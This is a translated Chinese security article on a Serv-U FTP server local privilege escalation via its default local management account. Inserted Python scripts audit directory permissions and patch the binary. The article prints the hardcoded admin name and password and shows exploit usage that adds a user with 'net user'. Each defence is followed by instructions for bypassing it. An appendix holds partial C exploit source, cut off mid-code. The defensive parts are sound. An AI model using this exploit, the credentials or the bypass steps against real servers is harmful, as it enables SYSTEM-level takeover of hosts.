By xiaolu
Serv-U FTP Server (Serv-U) is a widely used FTP server with powerful features and convenient administration. Serv-U versions 3.x and later contain a local privilege escalation vulnerability: a Guest-level account combined with an exploit (Exp) can run programs with SYSTEM privileges, and a webshell combined with the Exp has become a common route to elevated privileges.
Vulnerability introduction:
The vulnerability stems from Serv-U's local management port: the built-in default administrator can log on to it, create a new domain and a new user, and execute commands. In Serv-U 3.x and later the local management port defaults to 43958, the default administrator is LocalAdministrator, and the default password, compiled into Serv-U itself, is #l@$ak#.lk;0@P. Anyone with Guest-level access on the host can therefore connect to and administer Serv-U.
Prevention measures and countermeasures:
General prevention method: set directory permissions so that the Exp program cannot be run through a webshell, by removing the IUSR user's execute permission on the web directories.
Countermeasure: this method has limitations. There are many directories to set, and none may be missed. For example, I found that on many virtual hosts the permissions on C:\Documents and Settings\All Users and its subdirectories have not been set, so the Exp can be uploaded to and run from that directory. The same applies to directories such as x:\php and x:\perl, which are fully controlled by Everyone. Some hosts also support php, pl and aspx, which is simply a Serv-U disaster for the server, ^_^, and makes running programs even easier.
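The directory-permission check is easiest to keep honest with a script, because the weakness the countermeasure above describes is an overlooked directory rather than a missing idea. The following Python audit is an added example and is not part of the original article: it parses the output of icacls for a list of directories and flags every ACE that gives Everyone, Users, Authenticated Users, IIS_IUSRS or an IUSR_*/IWAM_* account a right that includes execute (F, M, RX, X or GE), while ignoring DENY entries. The icacls outputs are constructed for the example; the directory list, the low-privilege account patterns and the account name IUSR_WEB01 are assumptions.

```python
import re

# Sample `icacls <dir>` output for three directories, constructed for this
# example (no real host). The layout mirrors icacls: the first ACE shares the
# line with the path, later ACEs are indented, then a summary line follows.
SAMPLE_ICACLS = {
    r"C:\inetpub\wwwroot":
        r"C:\inetpub\wwwroot NT AUTHORITY\SYSTEM:(OI)(CI)(F)" "\n"
        r"                   BUILTIN\Administrators:(OI)(CI)(F)" "\n"
        r"                   WEB01\IUSR_WEB01:(OI)(CI)(RX)" "\n"
        "\n"
        "Successfully processed 1 files; Failed processing 0 files\n",
    r"C:\Documents and Settings\All Users":
        r"C:\Documents and Settings\All Users Everyone:(OI)(CI)(F)" "\n"
        r"                                    NT AUTHORITY\SYSTEM:(OI)(CI)(F)" "\n"
        "\n"
        "Successfully processed 1 files; Failed processing 0 files\n",
    r"C:\Program Files\Serv-U":
        r"C:\Program Files\Serv-U BUILTIN\Administrators:(OI)(CI)(F)" "\n"
        r"                        NT AUTHORITY\SYSTEM:(OI)(CI)(F)" "\n"
        r"                        WEB01\IUSR_WEB01:(DENY)(F)" "\n"
        "\n"
        "Successfully processed 1 files; Failed processing 0 files\n",
}

# Accounts a webshell or anonymous web request runs as, or groups that contain them
# (assumed list; extend it for the host being audited).
LOW_PRIV_ACCOUNTS = {"everyone", r"builtin\users",
                     r"nt authority\authenticated users", r"builtin\iis_iusrs"}
# icacls rights that include execute: full, modify, read+execute, execute, generic execute.
EXEC_RIGHTS = {"F", "M", "RX", "X", "GE"}


def parse_icacls(path, output):
    """Return [(trustee, [right tokens]), ...] from the output of `icacls path`."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):            # first ACE shares the line with the path
            line = line[len(path):].strip()
        trustee, _, rights = line.rpartition(":")
        tokens = [t for group in re.findall(r"\(([^)]*)\)", rights)
                  for t in group.split(",")]
        aces.append((trustee, tokens))
    return aces


def is_low_privileged(trustee):
    """True for Everyone, Users, Authenticated Users, IIS_IUSRS and IUSR_*/IWAM_* accounts."""
    name = trustee.lower()
    short = name.rsplit("\\", 1)[-1]
    return name in LOW_PRIV_ACCOUNTS or short.startswith(("iusr_", "iwam_"))


def grants_execute(tokens):
    """True if the ACE allows (rather than denies) a right that includes execute."""
    if "DENY" in tokens:
        return False
    return any(t in EXEC_RIGHTS for t in tokens)


def audit(outputs):
    """Flag (path, trustee, rights) wherever a low-privileged account can execute."""
    findings = []
    for path, output in outputs.items():
        for trustee, tokens in parse_icacls(path, output):
            if is_low_privileged(trustee) and grants_execute(tokens):
                findings.append((path, trustee, "".join(f"({t})" for t in tokens)))
    return findings


if __name__ == "__main__":
    for path, trustee, rights in audit(SAMPLE_ICACLS):
        print(f"EXECUTE ALLOWED  {path}  {trustee} {rights}")
```

On a real host, feed audit() a dictionary built by running icacls over every directory a web user can write to (the web root, the All Users profile, interpreter directories such as x:\php and x:\perl), not just the web root; the second sample directory is the case the countermeasure above describes, and it is flagged while the Serv-U directory, which only denies the IUSR account, is not.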
A more advanced prevention method: open ServUDaemon.exe in a hex editor, replace the last occurrence of B6AB (43958 as a little-endian 16-bit value) with 3930 (12345) and restart Serv-U. The local management port is now 12345:
TCP    127.0.0.1:12345    0.0.0.0:0    LISTENING
Countermeasure: this is easy to get around. netstat -an shows the port; admittedly netstat.exe itself may not be runnable, but a copy of netstat.exe can be uploaded to an executable directory and run there. Then adjust the Exp, recompile it, upload and run it. I modified the Exp so that the port can be specified; the usage is:
USAGE: serv-u.exe port "command"    Example: serv-u.exe 43958 "net user xl xiaoxue /add"
More advanced prevention measure: change the administrator name and password. Open ServUDaemon.exe in UltraEdit, search for the ASCII strings localadministrator and #l@$ak#.lk;0@P (the default password), and overwrite each with a replacement of exactly the same length.
Countermeasure: the default administrator can no longer connect. Is there a way around it? Heh heh, some administrators install Serv-U in the default directory under C:\Program Files. Open ServUDaemon.exe from there in UltraEdit and analyse it, and the Serv-U account and password are right there. Modify the Exp, recompile, upload and run it, and we win again.
Ultimate defense:
1. Set directory permissions carefully, leaving nothing out;
2. Do not use Serv-U's default installation path, and set the permissions on the Serv-U directory so that only administrators can access it;
3. Change Serv-U's default administrator name and password using the method described above; if you like, change the port as well.
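Steps 2 and 3 apply the hex-editor changes from the prevention sections above. The following Python script is an added example and is not part of the original article or of Serv-U: it performs the equal-length overwrite of the administrator name and password, replaces the last occurrence of the port bytes (B6AB for 43958 with 3930 for 12345), refuses any edit that would change the file length or that matches nothing, and then checks a netstat -an listing to confirm which ports are listening on 127.0.0.1. The binary blob and the netstat output are constructed for the example; the replacement name and password are placeholders, and the claim that ServUDaemon.exe stores these values as plain ASCII and a little-endian port is taken from the article, not verified here.

```python
import struct

# Constructed stand-in for ServUDaemon.exe (NOT the real file): a few header
# bytes, the two ASCII strings the article says to overwrite, an unrelated
# earlier B6 AB pair, and a final B6 AB pair standing in for port 43958.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 8
    + b"LocalAdministrator\x00"
    + b"#l@$ak#.lk;0@P\x00"
    + b"\x00" * 8 + b"\xb6\xab" + b"\x00" * 4     # earlier, unrelated occurrence
    + b"\x00" * 8 + b"\xb6\xab" + b"\x00" * 4     # last occurrence: the port
)

# Constructed `netstat -an` excerpt after the port patch (not real output).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    127.0.0.1:12345        0.0.0.0:0              LISTENING
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING
  TCP    192.168.1.10:21        203.0.113.5:51044      ESTABLISHED
"""


def port_bytes(port):
    """16-bit little-endian encoding as the article describes: 43958 -> B6 AB."""
    return struct.pack("<H", port)


def replace_all_equal_length(blob, old, new):
    """Overwrite every occurrence of `old` with `new`; the file layout must not change."""
    if len(old) != len(new):
        raise ValueError(f"replacement must be {len(old)} bytes, got {len(new)}")
    if old not in blob:
        raise ValueError(f"{old!r} not found: wrong file or version?")
    return blob.replace(old, new)


def replace_last(blob, old, new):
    """Overwrite only the last occurrence of `old` (the article patches the last B6AB)."""
    if len(old) != len(new):
        raise ValueError("length mismatch")
    idx = blob.rfind(old)
    if idx < 0:
        raise ValueError(f"{old!r} not found")
    return blob[:idx] + new + blob[idx + len(old):]


def harden(blob, new_admin, new_password, new_port,
           old_admin=b"LocalAdministrator", old_password=b"#l@$ak#.lk;0@P",
           old_port=43958):
    """Apply all three changes from the article to an in-memory copy of the binary."""
    patched = replace_all_equal_length(blob, old_admin, new_admin)
    patched = replace_all_equal_length(patched, old_password, new_password)
    patched = replace_last(patched, port_bytes(old_port), port_bytes(new_port))
    assert len(patched) == len(blob)          # equal-length edits never move code
    return patched


def loopback_listeners(netstat_text):
    """Ports in LISTENING state bound to 127.0.0.1 in `netstat -an` output."""
    ports = set()
    for line in netstat_text.splitlines():
        parts = line.split()
        if (len(parts) == 4 and parts[0] == "TCP" and parts[3] == "LISTENING"
                and parts[1].startswith("127.0.0.1:")):
            ports.add(int(parts[1].rsplit(":", 1)[1]))
    return ports


if __name__ == "__main__":
    # Placeholder replacements: 18 bytes for the name, 14 bytes for the password.
    new = harden(SAMPLE_BINARY, b"Sv-MaintAccount_01", b"Chg3Me!Now#2xQ", 12345)
    print("default admin string gone:", b"LocalAdministrator" not in new)
    print("loopback listeners:", sorted(loopback_listeners(SAMPLE_NETSTAT)))
```

Run harden() on a copy of the file with the Serv-U service stopped, keep the original for rollback, and then use loopback_listeners() on the real netstat -an output: 12345 should be present and 43958 absent. The equal-length check is the important part, because a longer or shorter replacement shifts every offset after it and breaks the executable.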
Postscript:
Attack and defence are like the spear and the shield: the shield cannot have a single weak spot, or things get ugly. The purpose of this article is to give server administrators a way to defend against this vulnerability. (The above was tested on Serv-U 5.0, 5.1 and 5.2.)
Appendix: Exp source code
#pragma comment(lib, "ws2_32.lib")
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>
// Responses
#define ban "220"
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to system maintenance mode."
#define DOMAINID "200-DomainID="
// Commands
#define XPLUSER "USER xl"
#define XPLPASSWORD "PASS 111111"
#define USER "USER LocalAdministrator"
#define PASSWORD "PASS #l@$ak#.lk;0@P"
#define MAINTENANCE "site maintenance"
#define EXIT "QUIT"
char newdomain[] = "-SETDOMAIN"
    "-Domain=xl|0.0.0.0|2121|-1|1|0"
    "-TZOEnable=0"
    "TZOKey=";
/* "-DynDNSEnable=0"
   "DynIPName=";
*/
char deldomain[] = "-DELETEDOMAIN"
    "-IP=0.0.0.0"
    "PortNo=2121";
char newuser[] =
    "-SETUSERSETUP"
    "-IP=0.0.0.0"
    "-PortNo=2121"
    "-User=xl"
    "-Password=111111"
    "-HomeDir=c:\\"
    "-LoginMesFile="
    "-Disable=0"
    "-RelPaths=1"
    "-NeedSecure=0"
    "-HideHidden=0"
    "-AlwaysAllowLogin=0"
    "-ChangePassword=0"
    "-QuotaEnable=0"
    "-MaxUsersLoginPerIP=-1"
    "-SpeedLimitUp=0"
    "-SpeedLimitDown=0"
&